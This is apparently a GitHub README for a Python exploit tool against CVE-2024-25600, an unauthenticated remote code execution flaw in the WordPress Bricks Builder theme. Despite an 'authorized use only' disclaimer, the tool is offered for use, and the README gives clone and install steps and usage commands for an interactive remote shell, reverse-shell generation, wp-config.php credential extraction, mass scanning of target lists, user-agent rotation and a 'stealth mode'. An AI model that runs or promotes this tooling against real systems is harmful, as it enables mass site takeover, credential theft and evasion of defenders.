
CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only.
Authorized security assessment tool for CVE-2024-25600
Author: Sudeepa Wanigarathna · Tool: BricksRCE Exploiter v1.0
Main script: cve-2024-25600.py
[!IMPORTANT] Authorized use only. This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.
CVE-2024-25600 is a critical, unauthenticated remote code execution vulnerability in the WordPress Bricks Builder theme. Improper handling of user-controlled input in the render_element REST endpoint allows unauthenticated attackers to execute arbitrary PHP/system commands on affected installations.
BricksRCE Exploiter (cve-2024-25600.py) is a full-featured Python assessment tool for authorized security professionals to:
| Attribute | Value |
|---|---|
| CVE ID | CVE-2024-25600 |
| CVSS | 9.8 (Critical) |
| Attack Vector | Network — unauthenticated |
| Impact | Full remote code execution, confidentiality / integrity / availability compromise |
| Affected Product | WordPress Bricks Builder theme |
| Affected Versions | Bricks ≤ 1.9.6 (patched in 1.9.6.1+) |
| Vulnerability Type | Unauthenticated Remote Code Execution |
| CWE | CWE-94 (Improper Control of Generation of Code) |
| Endpoint | Method |
|---|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
render_element request with a malicious element payload| Capability | Description |
|---|---|
| Vulnerability detection | Confirms RCE via controlled marker-based probe |
| Nonce extraction | Multi-method nonce discovery (scripts, page source, meta, REST) |
| Version detection | Identifies Bricks Builder version from CSS / readme / REST |
| Interactive shell | Full REPL with history, autocomplete, and file transfer |
| Single-command mode | Execute one command and exit (scripting-friendly) |
| Reverse shell helpers | Generate bash / nc / Python / PHP / Perl / Ruby reverse shells |
| wp-config extraction | Attempts to locate and read wp-config.php |
| Mass scanning | Async or threaded multi-target scanning from a URL list |
| Capability | Description |
|---|---|
| Rate limiting | Configurable delay between requests |
| Retry logic | Exponential backoff on timeouts and connection errors |
| User-Agent rotation | Random browser fingerprints per request |
| Stealth mode | Randomized Accept-Language / Accept-Encoding headers |
| Proxy support | HTTP, HTTPS, SOCKS5 / SOCKS5h |
| Dual endpoints | Prefer wp-json, rest_route, or both |
| Force mode | Skip pre-check and attempt exploitation directly |
| Rich CLI | Progress bars, tables, and colored panels via Rich |
| Capability | Description |
|---|---|
| JSON / TXT export | Save scan results and vulnerable targets |
| Command history | Optional logging of executed commands |
| File logging | Persistent bricks_rce.log plus custom log paths |
pipgit clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # optional — SOCKS5 proxy support
Replace
https://target.examplewith a lab or authorized target only.
# Interactive shell
python3 cve-2024-25600.py -u https://target.example
# Single command
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# Mass scan
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# Version detection
python3 cve-2024-25600.py -u https://target.example --detect-version
# Through Burp proxy
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
All examples use the main script:
cve-2024-25600.py
python3 cve-2024-25600.py --help
Opens an interactive RCE shell after confirming the target is vulnerable.
python3 cve-2024-25600.py -u https://target.example
Workflow:
--force)python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
Save command output to a file:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
# Default PHP exception-based payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php
# system() based payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
python3 cve-2024-25600.py -u https://target.example --detect-version
Combine with a command:
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
Saved as wp-config_<target>.txt on success.